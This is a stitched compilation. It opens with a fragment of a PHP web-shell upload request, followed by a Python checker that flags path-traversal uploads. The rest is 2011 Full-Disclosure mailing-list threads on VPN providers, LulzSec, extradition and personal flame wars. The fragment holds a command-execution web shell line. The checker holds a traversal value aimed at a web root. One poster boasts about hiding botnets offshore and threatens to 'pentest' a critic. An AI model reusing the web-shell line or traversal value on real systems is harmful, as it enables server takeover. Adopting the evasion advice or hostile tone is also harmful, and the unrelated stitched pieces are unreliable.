>> '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n'
>> '-5991806838789183981588991120--\r\n'
>>
>>
>> Then I found it did not work, and I KNOW there is a bug affecting things
>> for this area of boxes... I cannot say a lot more about that but I will only
>> say, there are bugs still affecting this, and I'm trying to secure one box
>> only for a client... so what credentials do I need?
>> anyhow, there is also one which i
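
A defensive check for the request shape quoted above (a form field carrying `../` sequences next to a file upload), added here as an example and not part of the thread or of the application's own code. `UPLOAD_BASE`, the field set, the extension list and both sample bodies are assumptions constructed for the example.

```python
import posixpath
import re
from email.parser import BytesParser
from email.policy import default

# Assumptions for this example; none of these values come from the thread.
UPLOAD_BASE = "/srv/app/uploads"            # hypothetical directory uploads belong in
PATH_FIELDS = {"usersnum"}                  # fields the server folds into a file path
SCRIPT_EXTS = {".php", ".phtml", ".phar"}   # extensions the web server would execute
SAFE_COMPONENT = re.compile(r"[A-Za-z0-9_-]{1,64}")


def parse_form(content_type, body):
    """Parse a multipart/form-data body into (name, filename, bytes) tuples."""
    head = ("MIME-Version: 1.0\r\nContent-Type: %s\r\n\r\n" % content_type).encode("ascii")
    msg = BytesParser(policy=default).parsebytes(head + body)
    parts = []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        parts.append((name, part.get_filename(), part.get_payload(decode=True) or b""))
    return parts


def escapes_base(value, base=UPLOAD_BASE):
    """True if joining value onto base resolves (lexically) outside base."""
    target = posixpath.normpath(posixpath.join(base, value))
    return target != base and not target.startswith(base + "/")


def inspect_upload(content_type, body):
    """Return (field, reason) findings for one multipart upload request."""
    findings = []
    for name, filename, data in parse_form(content_type, body):
        if filename is None:
            # Plain form field: only fields used to build a path are checked.
            if name not in PATH_FIELDS:
                continue
            value = data.decode("utf-8", "replace").strip()
            if escapes_base(value):
                findings.append((name, "path-escape"))
            elif not SAFE_COMPONENT.fullmatch(value):
                findings.append((name, "not-a-plain-component"))
        else:
            # File part: the client-supplied name must be a bare, non-script name.
            flat = filename.replace("\\", "/")
            if posixpath.basename(flat) != filename:
                findings.append((name, "filename-has-path"))
            if posixpath.splitext(flat.lower())[1] in SCRIPT_EXTS:
                findings.append((name, "script-extension"))
    return findings


def build_body(boundary, fields, file_field, filename, content):
    """Build a constructed multipart body for the sample inputs below."""
    out = []
    for name, value in fields:
        out.append('--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
                   % (boundary, name, value))
    out.append('--%s\r\nContent-Disposition: form-data; name="%s"; filename="%s"\r\n'
               'Content-Type: application/octet-stream\r\n\r\n%s\r\n--%s--\r\n'
               % (boundary, file_field, filename, content, boundary))
    return "".join(out).encode("ascii")


# Constructed sample inputs (field names and the traversal value follow the
# quoted request; file contents are inert placeholders).
BOUNDARY = "constructedBoundary1234"
CT = "multipart/form-data; boundary=" + BOUNDARY
SUSPICIOUS_BODY = build_body(
    BOUNDARY,
    [("display", "recordings"), ("action", "recordings_start"),
     ("usersnum", "../../../../../var/www/html/admin/zmeu.php")],
    "ivrfile", "upload.php", "constructed placeholder, not a payload")
BENIGN_BODY = build_body(
    BOUNDARY,
    [("display", "recordings"), ("action", "recordings_start"), ("usersnum", "1001")],
    "ivrfile", "greeting.wav", "constructed placeholder audio")

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_upload(CT, body))
```

The containment check is lexical only; a deployed check would also resolve symlinks before comparing against the base directory.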

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-30 Thread xD 0x41
They advertised as anonymous VPN to 'everyone'.
Then, that would mean, especially NOT locally, that's something which is also,
subject to federal laws though so, in its own country, the provider may have
to, no matter what's advertised, BUT outside of country customers, should not
be handed over.
ISPs here don't do it, and haven't, for like 20 yrs, they also do not take
down people, issue nor execute other people's 'takedown orders', there are many
reasons for this but basically, they lose money from it.
Anyhow, in UK, you may be right, but outside of there, then, they should have
maybe not advertised as anonymous VPN services for everyone and anyone.
that's obvious crap we know now.
anyhow, cheers,
xd


On 29 September 2011 22:45, Benji  wrote:

> I'm sorry, why is it 'worrying' that a VPN provider that was a UK business
> and was located in the UK, is subject to UK law?
>
>
>
> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
> d.martyn.fulldisclos...@gmail.com> wrote:
>
>> Again, I hope this does not fail to send.
>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>> recruit some talented people (and, by all accounts, there were some talented
>> programmers there) and B: development and idle talk. Now more interesting
>> was the reasoning behind the name - by putting the developers and coders and
>> potential recruits in a channel named "Pure Elite", it was essentially an
>> ego boost for the new guys, made them feel valued, etc, when in fact most
>> were but pawns to be used (IMHO).
>>
>> This co-operation between VPN providers and LEO, while being nothing new -
>> remember how hushmail caved in - is indeed worrying for those of us who are
>> privacy advocates as well as security researchers.
>>
>> On a more direct note, Laurelei, do not presume that you know all there is
>> to know about them. Doing so would be foolish. (Now don't go assuming that I
>> hate you, I bear you bugger all ill-will, etc).
>> Good day.
>>
>>
>> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm wrote:
>>
>>> It's all good dude. What really concerns me is that VPN providers might
>>> give over logs to oppressive regimes. TOR is starting to look better and
>>> better.
>>> On Sep 27, 2011 11:40 PM, "GloW - XD"  wrote:
>>> > never did... was only for one buttcheek kid that I was a little pissed and
>>> > thinking things which, prolly were wrong at the time...
>>> > I am adult enough to apologise for what happened back then, and hopefully
>>> > it is just, cool.
>>> > :)
>>> > cheers, you're loved by many, you just have many trollers too :sp
>>> > take care ,
>>> > xd
>>> >
>>> >
>>> > On 28 September 2011 14:32, Laurelai Storm wrote:
>>> >
>>> >> I'm surprised, someone on the internet who *doesn't * hate me :p
>>> >> On Sep 27, 2011 11:29 PM, "GloW - XD"  wrote:
>>> >> > Hello Laurelai ,
>>> >> > Oh I agree it is still a terrible precedent to be set.. I don't even
>>> >> > know where, legally, I stand anymore...
>>> >> > It is rather disturbing, no matter WHO it was Laurelai.
>>> >> > I am all for the hatred against the VPN provs, and this is not just
>>> >> > happening here, and I made a BIG statement about this, and privacy, in
>>> >> > my channel on efnet, first as I saw it.
>>> >> >
>>> >> > Then saw a torrentfreak feed, of someone who was an owner of a huge
>>> >> > torrent site, was handed to authorities, not by the hoster, no... but
>>> >> > by the frigging payment handler, i.e. paypal or alertpay most likely.
>>> >> >
>>> >> > This is not good, it makes a grey cloud now over what is 'anon' and
>>> >> > what isn't. and that's a bad thing for us all.
>>> >> > Too much fraud is causing this, that's plain and simple. Abusing places
>>> >> > like Sony, and, major banks, only make the authorities turn to
>>> >> > politics, whom in turn can bully with federal and state laws of ANY
>>> >> > country, I think this is the dangerous part which is affecting lulzsec
>>> >> > members or whoever was a part of it, and, I mean efnet is no recruiting
>>> >> > grounds for decent hkrs.
>>> >> > Simple as that, you know it, maybe thru word of mouth ok, but not alone
>>> >> > by being in channels but that network, is one federal hideout now..and,
>>> >> > that is every channel, if it is not being spied (yea they have a module
>>> >> > m_spychannel.c or similar, which, they actually had without realising,
>>> >> > asked a friend, to code for them.
>>> >> > This was rejected by me/her, but I believe they have the module running
>>> >> > now.
>>> >> > So, what was to stop them adding their own hidden spy mode to it :s
>>> >> > look at what they did to my old channel #haqnet, they introduced
>>> >> > drinemon and a bunch of other things, when it could have been simply
>>> >> > worked out with words.. but anyhow, I will not brood on the past, I
>>> >> > hope this is mutual Laurelai, I have nothing bad to say about you, and
>>> >> > in turn, expect th

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-30 Thread xD 0x41
err, you are limited in those countries dude... I'd really check up on that
... maybe some but, yea I agree, I don't think any hosting is anon, but, I
sure know I have kept an anon dedis in past, and was VERY easy to avoid
handing anything over. Unless they had personally seized from my company, I
was allowed to basically get away with, and if I want to, again, could do
the same 'anonymously' and, indeed keep those details, away.
it is not friggin hard dude, where did you get the idea, that is not hard to
move a user around boxes :P
and rename them, etc etc etc, always change IPv6 tunnels... there are so many
ways, you obv have not run a dedicated server in a company environment coz
boi, they hide nets on legit hosting now, legit apparently* companies...and
they do it using those simple means, and, even show logs of them 'removing
and deleting' files of the apparent 'bad user' , this is, a whole different
level than even needing to deal with cops.. so, you are scared too much by
laws which can be smokescreened.
Run a dedis, or simply ask an admin, how many abuse they get, and how many
users they actually rm ;)
you would want this service, on your VPS ?
I surely wouldn't,. I know, with me, if I offer anon, you stay damn anon, if
you bring cops to MY HOUSE, then I may have to try and, simply keep my darn
data secure ey ?
how about that ?
simple methods, defeat simple plans benji.
xd


On 29 September 2011 22:53, Benji  wrote:

> Yes they do. If you buy a server in America for example, even if you are
> located in Russia, they are required by federal law to hand over your
> details wherever you may reside. I don't know where you've obtained this idea
> that they can't.
>
> Just because something is advertised as 'anonymous' doesn't mean it's 'so
> anonymous you can break the law' and anyone using an EU/US-related country to
> do this is either stupid or naive.
>
> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>
>> They advertised as anonymous VPN to 'everyone'.
>> Then, that would mean, especially NOT locally, that's something which is
>> also, subject to federal laws though so, in its own country, the provider
>> may have to, no matter what's advertised, BUT outside of country customers,
>> should not be handed over.
>> ISPs here don't do it, and haven't, for like 20 yrs, they also do not take
>> down people, issue nor execute other people's 'takedown orders', there are
>> many reasons for this but basically, they lose money from it.
>> Anyhow, in UK, you may be right, but outside of there, then, they should
>> have maybe not advertised as anonymous VPN services for everyone and
>> anyone. that's obvious crap we know now.
>> anyhow, cheers,
>> xd
>>
>>
>>
>> On 29 September 2011 22:45, Benji  wrote:
>>
>>> I'm sorry, why is it 'worrying' that a VPN provider that was a UK business
>>> and was located in the UK, is subject to UK law?
>>>
>>>
>>>
>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>> d.martyn.fulldisclos...@gmail.com> wrote:
>>>
>>>> Again, I hope this does not fail to send.
>>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>>> recruit some talented people (and, by all accounts, there were some
>>>> talented programmers there) and B: development and idle talk. Now more
>>>> interesting was the reasoning behind the name - by putting the developers
>>>> and coders and potential recruits in a channel named "Pure Elite", it was
>>>> essentially an ego boost for the new guys, made them feel valued, etc,
>>>> when in fact most were but pawns to be used (IMHO).
>>>>
>>>> This co-operation between VPN providers and LEO, while being nothing new
>>>> - remember how hushmail caved in - is indeed worrying for those of us who
>>>> are privacy advocates as well as security researchers.
>>>>
>>>> On a more direct note, Laurelei, do not presume that you know all there
>>>> is to know about them. Doing so would be foolish. (Now don't go assuming
>>>> that I hate you, I bear you bugger all ill-will, etc).
>>>> Good day.
>>>>
>>>>
>>>> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm 
>>>> wrote:
>>>>
>>>>> It's all good dude. What really concerns me is that VPN providers might
>>>>> give over logs to oppressive regimes. TOR is starting to look better and
>>>>> better.
>>>>> On Sep 27, 2011 11:40 PM, "GloW - X

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-30 Thread xD 0x41
indeed :)
but, it is how a proper anon person would operate, well, that is how I once
did...
anyhow, it is too broad, and, yes, I would never believe in bulletproof,
unless I have used it maybe, for 10yrs, thru 10 botnets ;P which, is very
rare but funnily, possible.
webhosters, are even more corrupt and better at hiding data.. face it, if
the VPN provider had not shat themself, then it would be a non story.



On 29 September 2011 23:00, Benji  wrote:

> 'Abuse' emails and court orders are very different.
>
> On Thu, Sep 29, 2011 at 1:59 PM, xD 0x41  wrote:
>
>> err, you are limited in those countries dude... I'd really check up on that
>> ... maybe some but, yea I agree, I don't think any hosting is anon, but, I
>> sure know I have kept an anon dedis in past, and was VERY easy to avoid
>> handing anything over. Unless they had personally seized from my company, I
>> was allowed to basically get away with, and if I want to, again, could do
>> the same 'anonymously' and, indeed keep those details, away.
>> it is not friggin hard dude, where did you get the idea, that is not hard
>> to move a user around boxes :P
>> and rename them, etc etc etc, always change IPv6 tunnels... there are
>> so many ways, you obv have not run a dedicated server in a company
>> environment coz boi, they hide nets on legit hosting now, legit apparently*
>> companies...and they do it using those simple means, and, even show logs of
>> them 'removing and deleting' files of the apparent 'bad user' , this is, a
>> whole different level than even needing to deal with cops.. so, you are
>> scared too much by laws which can be smokescreened.
>> Run a dedis, or simply ask an admin, how many abuse they get, and how many
>> users they actually rm ;)
>> you would want this service, on your VPS ?
>> I surely wouldn't,. I know, with me, if I offer anon, you stay damn anon,
>> if you bring cops to MY HOUSE, then I may have to try and, simply keep my
>> darn data secure ey ?
>> how about that ?
>> simple methods, defeat simple plans benji.
>> xd
>>
>>
>>
>> On 29 September 2011 22:53, Benji  wrote:
>>
>>> Yes they do. If you buy a server in America for example, even if you are
>>> located in Russia, they are required by federal law to hand over your
>>> details wherever you may reside. I don't know where you've obtained this idea
>>> that they can't.
>>>
>>> Just because something is advertised as 'anonymous' doesn't mean it's 'so
>>> anonymous you can break the law' and anyone using an EU/US-related country to
>>> do this is either stupid or naive.
>>>
>>> On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41  wrote:
>>>
>>>> They advertised as anonymous VPN to 'everyone'.
>>>> Then, that would mean, especially NOT locally, that's something which is
>>>> also, subject to federal laws though so, in its own country, the provider
>>>> may have to, no matter what's advertised, BUT outside of country customers,
>>>> should not be handed over.
>>>> ISPs here don't do it, and haven't, for like 20 yrs, they also do not
>>>> take down people, issue nor execute other people's 'takedown orders', there
>>>> are many reasons for this but basically, they lose money from it.
>>>> Anyhow, in UK, you may be right, but outside of there, then, they should
>>>> have maybe not advertised as anonymous VPN services for everyone and
>>>> anyone. that's obvious crap we know now.
>>>> anyhow, cheers,
>>>> xd
>>>>
>>>>
>>>>
>>>> On 29 September 2011 22:45, Benji  wrote:
>>>>
>>>>> I'm sorry, why is it 'worrying' that a VPN provider that was a UK
>>>>> business and was located in the UK, is subject to UK law?
>>>>>
>>>>>
>>>>>
>>>>> On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn <
>>>>> d.martyn.fulldisclos...@gmail.com> wrote:
>>>>>
>>>>>> Again, I hope this does not fail to send.
>>>>>> The reasoning behind the "Pure Elite" recruitment channel was A: to
>>>>>> recruit some talented people (and, by all accounts, there were some
>>>>>> talented programmers there) and B: development and idle talk. Now more
>>>>>> interesting was the reasoning behind the name - by putting the
>>>>>> developers and coders and
>>>

[Full-disclosure] VPN providers and any providers in general...

2011-09-30 Thread xD 0x41
Dude, If you really want to be 'invisible' this is not hard to do..
if you expect to, jump around on people's servers, illegally, for long
amounts of time, i.e., daily/weekly/yearly, and are a pest, who would want to
make you or help you even be invisible.
there are KNOWN places, I have used, and known places which will not store
data, or maybe, provide a proxy but, they can certainly hide a botnet...
but of course, these things don't come cheap :)
there are for sure places, go ahead and try and screw over a server in say...
Panama ? ever checked their laws ?
ONLY people who commit ANY crime in THEIR country, will be arrested...ever
noticed the main BIGGER servers are hosted there, even chat ones ?
That's just how it has and always will be, where and if you wish to pursue
this method..as you said yourself, do it yourself..and that's fine, for me..
I also speak from someone who does not believe in using VPN providers, but,
I know which countries I could rely on, for a secure box.
That's just laws..which is all online... Panama, is only one of 10 I can think
of offhand... that's plenty of servers.
cute eh
cheers.
xd

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-01 Thread xD 0x41
ithin 5yrs, but, that is
probably too close.. but, it will happen, then, there will be
official treaties which cannot be avoided, and, maybe less 'seizure' of boxes,
and more 'security work' , which is, how the most effective takedowns work..
but, any ISP manager knows the truth, ISPs receive hundreds of
takedown-orders yearly, and, act on none.
So, it is not a matter of just law, there is still the grey cloud of *where's
the rest of the laws* to make it any real, good and viable direct way to
arrest someone, in one simple phone call and fax. that is where it will be,
once there are more NOCs around and feds online. The military, already
spends millions on its own sec, so, they're no dummies, yet, they also use
facebook :P
the internet, is still evolving, once the evolution is a bit more complete
legally, there will still be a cloud over each and every bust, as each one
is different, and, questions raised as to what/why/who done what, and, as I
know of at this date there is still a guy being blamed for this, who says
it did not happen at all lately, but, over a year ago, and, he was
'questioned', now, I have his private log of conversation, should I be
subject to, storing this for another country, and, holding it as evidence,
but, what the heck if my HD blows up :P
the cloud hovers...

great topic but, still a very grey area, unfortunately.
(I'd like to know where I'd even be ranked! I'd like to think, a General or,
maybe PM!)
cheers,
xd



On 1 October 2011 08:36,  wrote:

> On Thu, 29 Sep 2011 23:55:18 +1000, xD 0x41 said:
>
> > there are KNOWN places, I have used, and known places which will not store
> > data, or maybe, provide a proxy but, they can certainly hide a botnet...
>
> As far as you know... :)
>
> > ONLY people who commit ANY crime in THEIR country, will be arrested...ever
> > noticed the main BIGGER servers are hosted there, even chat ones ?
>
> Not sure how that should be parsed, and the parsing is crucial here - did
> you mean "they have to commit a crime in their country", or "They have to do
> something that *would* be a crime in their country"?
>
> The general rule is that in order for an extradition to happen, several
> things must be true:
>
> 1) The two countries involved need to have extradition treaties in place.
> 2) The activity must constitute a crime in the country harboring the accused.
> 3) The proposed punishment must not be drastically worse than what the
> harboring country would impose
>
> So the US can extradite somebody for murder from pretty much anyplace,
> because out of 213 or so recognized sovereign governments, there's something
> like 8 that don't have reciprocal treaties in place for extradition, and
> murder is illegal in pretty much everywhere.  However, if you're going after
> somebody for cybercrime, it won't work unless the country has laws against
> cybercrime that cover the situation in question.  As for the third part, the
> US has on several occasions had to guarantee no death penalty for accused
> murderers they've extradited from countries that don't do capital punishment.
>
> So Gary McKinnon got hit with extradition even though he never got accused
> of breaking a British law (as far as I know)- because the charge *would* have
> been a crime if he *had* targeted a British server rather than a US server.
> Meanwhile, Julian Assange's extradition on a rape charge hit some serious
> legal snags because the exact behavior that Assange was accused of didn't
> actually meet the definition of "rape" in England.
>
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-01 Thread xD 0x41
haha I should have just agreed with this bit from the start!

However, if you're going after somebody for cybercrime, it won't work unless
the country has laws against cybercrime that cover the situation in question.

!! lol!! still, a very funny story there with UK...but they're, again, a
monarchy, and, they kinda have laws to suit them :P
As you also said, murder is a no brainer in any place...well, maybe not Iraq
or Afghanistan just yet :P lol..
anyhow, thanks for the interesting place to take my head at 9am :P , very
interesting the topic as a whole..very good to debate this stuff, and run
for/against it, because then you would probably see more too... so, I guess
some people should disagree for the sake of argument's sake or, just kill the
thread ;p
lol, take care Valdis,
xd / Dru




On 1 October 2011 08:36,  wrote:

> On Thu, 29 Sep 2011 23:55:18 +1000, xD 0x41 said:
>
> > there are KNOWN places, I have used, and known places which will not store
> > data, or maybe, provide a proxy but, they can certainly hide a botnet...
>
> As far as you know... :)
>
> > ONLY people who commit ANY crime in THEIR country, will be arrested...ever
> > noticed the main BIGGER servers are hosted there, even chat ones ?
>
> Not sure how that should be parsed, and the parsing is crucial here - did
> you mean "they have to commit a crime in their country", or "They have to do
> something that *would* be a crime in their country"?
>
> The general rule is that in order for an extradition to happen, several
> things must be true:
>
> 1) The two countries involved need to have extradition treaties in place.
> 2) The activity must constitute a crime in the country harboring the accused.
> 3) The proposed punishment must not be drastically worse than what the
> harboring country would impose
>
> So the US can extradite somebody for murder from pretty much anyplace,
> because out of 213 or so recognized sovereign governments, there's something
> like 8 that don't have reciprocal treaties in place for extradition, and
> murder is illegal in pretty much everywhere.  However, if you're going after
> somebody for cybercrime, it won't work unless the country has laws against
> cybercrime that cover the situation in question.  As for the third part, the
> US has on several occasions had to guarantee no death penalty for accused
> murderers they've extradited from countries that don't do capital punishment.
>
> So Gary McKinnon got hit with extradition even though he never got accused
> of breaking a British law (as far as I know)- because the charge *would* have
> been a crime if he *had* targeted a British server rather than a US server.
> Meanwhile, Julian Assange's extradition on a rape charge hit some serious
> legal snags because the exact behavior that Assange was accused of didn't
> actually meet the definition of "rape" in England.
>
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-01 Thread xD 0x41
Good q,
I think B and C would have some jurisdiction, depending on crime impact ofc.
yes indeed, if one of those countries is say USA and the hacker has used X
to rip off A for huge huge amounts of say credit card injections... then
for sure something is there, or, they would make it on the spot I am sure, if
it were USA :)
I wonder though, about Australia, and UK and some other smaller countries,
they may not... which is, the greyish area still... but, I think it is crime
impact on this one, and country A or B, being a power, politically, press
wise, especially..
It is a good case to watch the Assange, as they're basically doing just that
now with him, creating the laws needed to create the extraditions... or so I
believe.
Although his case is a bit cloudy , the rape being connected with, WikiLeaks
for example..
But, that is where they make things up even, to create press, crime
impact/victim impact, is paramount.
regards,
xd


On 1 October 2011 23:03, Darren Martyn wrote:

> Quick question regarding the extradition stuff. Say hacker X was caught in
> country A, for cyber crimes in country A, but had also committed crimes
> against servers in countries B and C. Would B and C have any right to
> extradite him/her or would they merely be tried for said crimes in country
> A? (assuming country A brought them to trial in the end).
>
> Anyone have a definitive answer?
>
> On Sat, Oct 1, 2011 at 5:50 AM,  wrote:
>
>> On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said:
>>
>> > As you also said, murder is a no brainer in any place...well, maybe not
>> > Iraq or Afghanistan just yet :P lol..
>>
>> Iraq, for all its problems, is still a place with a somewhat functional
>> judicial system. The court system may be broken, but you in general *will*
>> at least appear in a courtroom with a judge and be pronounced guilty before
>> you're punished.
>>
>> I was actually thinking more along the lines of totally failed states
>> such as Somalia, Sudan, or the contested parts of Afghanistan, where you
>> can't be tried for murder because there isn't a court to try you *in*.
>>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-02 Thread xD 0x41
Ah, the legend of the mailing-list himself, has spoken.
not knowing you, for all I have seen, you're a pathetic sack of rubbish, and
really, what we are discussing, if you had ANY clue, which obv don't, is
simply how far our own freedom is going.
You are an idiot.
Have a nice day.
xd


On 2 October 2011 08:45, andrew.wallace wrote:

> On Sat, Oct 1, 2011 at 5:50 AM,   wrote:
> > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said:
> >
> >> As you also said, murder is a no brainer in any place...well, maybe not
> >> Iraq or Afghanistan just yet :P lol..
> >
> > Iraq, for all its problems, is still a place with a somewhat functional
> > judicial system. The court system may be broken, but you in general
> > *will* at least appear in a courtroom with a judge and be pronounced
> > guilty before you're punished.
> >
> > I was actually thinking more along the lines of totally failed states
> > such as Somalia, Sudan, or the contested parts of Afghanistan, where you
> > can't be tried for murder because there isn't a court to try you *in*.
> >
>
> Have you not grown old of talking to children on mailing lists?
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> www.n3td3v.org.uk
>

[Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread xD 0x41
Hi n3td3v,
I just decided to see, exactly who you are, calling me a kid.
Now I run a site, crazycoders.com , very small, I have, apparently, a lot
more knowledge in IT sec, than yourself and your credentials.
I don't put anywhere, I am some 'security consultant' , why, because
security is ever evolving, unlike your website layout..
http://n3td3v.org.uk/
Your website is pathetic, and mirrors your own self, usually that's how it
goes, but I could just be wrong.
Also for an IT consultant demanding things, you only have published, useless
and false PoCs, I could point probably 100 of those out at least, you're
seemingly not well liked by *everyone* in the sec world, yet you dare to
call people such as Valdis, Benji, me , kids. ?
you're really pathetic, I pray you just *poof* disappear.. but, I guess that
would just be too easy nowadays, wouldn't it ?
How is that linespeed now, on your n3td3v , is it as secure, as you seem to
want to portray ? can I see if it is ? I will pentest you, you cry, sounds
good to me.
Have fun!
xd


PS: You seem to be the kid here, not us people discussing a very legal
problem.

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread xD 0x41
hahah ofc, now you're a federal policeman too!
yes mate.. please, go jerk off somewhere else, don't bother to speak to me,
because, I don't care less for what you're even speaking about, nor care less
for you either, and yea, I'm in .au, UK has great treaties here, arrest me :)
cheers
xd

PS: You're too stupid to even pass a police test, and probably too fat.


On 2 October 2011 12:38, andrew.wallace wrote:

> I do like to investigate and lock people up when necessary.
>
> If you were to for instance: take out critical infrastructure in the UK,
> the energy & utilities sector, transportation and disable a Royal Navy ship
> from communicating you may get my attention.
>
> Andrew
>
> ------
> *From:* xD 0x41 
> *To:* andrew.wallace ;
> full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu; Benji <
> m...@b3nji.com>
> *Sent:* Sunday, October 2, 2011 12:44 AM
> *Subject:* Is this for real.. http://n3td3v.org.uk/
>
> Hi n3td3v,
> I just decided to see, exactly who you are, calling me a kid.
> Now I run a site, crazycoders.com , very small, I have, apparently, a lot
> more knowledge in IT sec, than yourself and your credentials.
> I don't put anywhere, I am some 'security consultant' , why, because
> security is ever evolving, unlike your website layout..
> http://n3td3v.org.uk/
> Your website is pathetic, and mirrors your own self, usually that's how it
> goes, but I could just be wrong.
> Also for an IT consultant demanding things, you only have published,
> useless and false PoCs, I could point probably 100 of those out at least,
> you're seemingly not well liked by *everyone* in the sec world, yet you dare
> to call people such as Valdis, Benji, me , kids. ?
> you're really pathetic, I pray you just *poof* disappear.. but, I guess that
> would just be too easy nowadays, wouldn't it ?
> How is that linespeed now, on your n3td3v , is it as secure, as you seem to
> want to portray ? can I see if it is ? I will pentest you, you cry, sounds
> good to me.
> Have fun!
> xd
>
>
> PS: You seem to be the kid here, not us people discussing a very legal
> problem.
>
>
>
>

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread xD 0x41
Laurelai , you think I did that for 'looks' :) I have had that up, BUT not
spammed any links for it, never, and, I waited for anyone to pick it.
not once until this topic came up, so at least we will see, although I have
already dealt with this, and oh, psychz.net know me very well and my
website, and funny but, there is a VERY tight relationship there :)
I will wait and see if they get pestered by M$ , I will be in awe of the
great n3td3v ? no, I will then know at least there are SOME laws which work,
but again it proves little about more serious stuff, but, nowadays wares
should be enough.
Anyhow, we will see, but I ain't touching my website, until Psychz has a
'takedown' order, and, you should know what this is yes n3td3v ? and
understand, it may not affect me, nor my hosters, and, then where will u be
at ?
I have done well to be a troll, this experiment in itself, is amazing
results.
So far, only one idiot who even spoke up when we discussed security, I am
trying to get somewhere... but, the wrong person showed up :s
got a fatty, rather than a cop.
oh well, maybe next shot I'll b luckier ;P
xd
CRAZYCODERS.COM fo eva baby!
PS come get me fatty n3td3v , show me your name on a takedown order which
*I* must agree to.




On 3 October 2011 10:03, Laurelai Storm  wrote:

> They haven't managed to get rid of Wikileaks or Pirate Bay :)
> On Oct 2, 2011 5:55 PM, "Jeffrey Walton"  wrote:
> > On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm 
> wrote:
> >> I don't think they have the authority to seize non us domains owned by
> >> people not in the US.
> > DNS is vulnerable to attackers and legislation alike.
> >
> >> On Oct 2, 2011 5:44 PM, "andrew.wallace"  >
> >> wrote:
> >>> On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD  wrote:
>  Yes, it is nice ay :)
>  When M$ asks me to remove it, I shall.
>  cheers.
>  xd
> >>>
> >>> It doesn't work that way, your domain will be seized by DHS-ICE.
> >>>
> >>> http://www.ice.gov/about/offices/homeland-security-investigations/
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread xD 0x41
Good move!

Going back to my own example, say all three are first world countries, and A
and C are in the EU whilst B is the US. All nations involved have good
diplomatic relations and preexisting extradition treaties, and to add
interest to it, lets say the LEO in B and C helped the investigation. The
crimes would be non-financial, but say, large scale hacks and such. I will
use Jake Davis's case as a "canary case" for this though...

I'd say, if the hacks are financial, then for sure yes.
If the guy is continuously ripping the places off and LEO is then involved
directly, the investigation would be of course funded by whomever was
losing funds probably, as i know with some other cases, this has been the
case with one usa person who was really angry about being rooted and such..
so he personally financed the whole lot. i assume this would speed it up...
so, i would say, if there is also some fbi.gov investigations opened on it,
then the usa will be directly involved in a way, and be even more able to
execute any warrants such as box seizures or router-taps.
I am saying "yes" in this case if the financiers personally fund it, 100%
yes.
I am sure, if there is a few people losing money, and they're offered to use
that route, it would be considered. It was and has been done in Australia,
and the box was in usa soil and it was the fastest takedown i have seen,
which had abs NO press involved.
So, you have 2 countries here, and 2 leo involved, of course they will
workout something if there is financial gain to be had.. the hacks alone, is
classed as 'break and enter' at moment, at-best.
I know this excuse (exactly: sql-injection) was used as a means to get
router taps to actually, takedown the person for ddos and ddos networks. It
is just, the people who were getting ddosd, personally came to the country
the servers were mainly in, they were just one of many isps involved, and
personally sat and laid the charges, so the police had a direct order
(singapore - au) , and bang, they got him.. he is fine tho, the charges were
minimal and he did abs no time.
the case is somewhat primitive but, for hacks alone, i know the guy is still
around irc and, knows that he cannot do anything illegal or, presumes that,
he is always watched now by fbi or others.
So it is hard one.
i say yes, because i've seen it done, but only if the treaty is extremely
clear and, with ALL countries this would have to be, agreed upon at least,
if not executed in usa, at least they would agree to the act and, possibly
assist if need be.
Is very wide, financial gain and paedophilia is the main targets atm, which is
'thank god they're not wasting time on wares..' basic, is my attitude and
always will be on this..
I still think, a hoster, has not to takedown anyone, specially if the
customer is promoting free speech (and is being done right now with
wikileaks..) so, what a mess!
great topic tho, love this, it is really interesting, but, again i would
like to call on a higher authority to simply make a post regarding this,
someone with some power in a large company, who would have a vested interest
in NOT getting owned and, their databases of cc stolen, that's what i want,
a personal opinion from someone higher, who has this as a potential to
become a problem one day.
I guess i am a bit hardcore on this whole topic eh ;p
cheers, it makes for good thinking,
xd






On 3 October 2011 19:16, Darren Martyn wrote:

> Going back to my own example, say all three are first world countries, and
> A and C are in the EU whilst B is the US. All nations involved have good
> diplomatic relations and preexisting extradition treaties, and to add
> interest to it, lets say the LEO in B and C helped the investigation. The
> crimes would be non-financial, but say, large scale hacks and such. I will
> use Jake Davis's case as a "canary case" for this though...
>
> On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41  wrote:
>
>> Ah, the legend of the mailing-list himself, has spoken.
>> not knowing you, for all i have seen, you're a pathetic sack of rubbish, and
>> really, what we are discussing, if you had ANY clue, which obv don't, is
>> simply how far our own freedom is going.
>> You are an idiot.
>> Have a nice day.
>> xd
>>
>>
>>
>> On 2 October 2011 08:45, andrew.wallace wrote:
>>
